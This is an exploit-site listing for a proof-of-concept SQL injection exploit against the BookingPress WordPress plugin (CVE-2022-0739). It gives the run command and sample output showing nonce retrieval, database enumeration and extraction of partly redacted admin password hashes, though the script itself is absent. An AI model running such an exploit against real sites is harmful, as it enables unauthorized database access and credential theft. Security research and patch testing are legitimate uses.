Share
## https://sploitus.com/exploit?id=0F14274C-17BD-5D69-A566-31B2A762AA75
# CVE-2022-0739
Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)
#Usage
Supply the URL to where the Booking Press plugin is in use on the application.
bash exploit.sh '<insert url here>'
e.g. (Hashes are redacted in this demo)
โโโ(user@user)-[~/]
โโ$ bash sqli_exploit.sh 'http://localhost/calendar/'
____ __ _ ____
/ __ )____ ____ / /__(_)___ ____ _/ __ \________ __________
/ __ / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
/ /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ / / __(__ |__ )
/_____/\____/\____/_/|_/_/_/ /_/\__, /_/ /_/ \___/____/____/
/____/
_______ ________ ___ ____ ___ ___ ____ __________ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ / __ \/__ /__ // __ \
/ / | | / / __/________/ // / / /_/ /__/ /_____/ / / / / / /_ </ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ / / /___/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/ /_//____//____/
[+] Exploiting http://localhost ...
[+] Vulnerable url at http://localhost/calendar/...
[+] Gettting nonce...
[+] Found nonce: 219087f4c2
[+] Extract database name...
information_schema
test_db
[+] Getting creds...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
---------------------------------------------------------------------
DISCLAIMER
Usage of this program without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.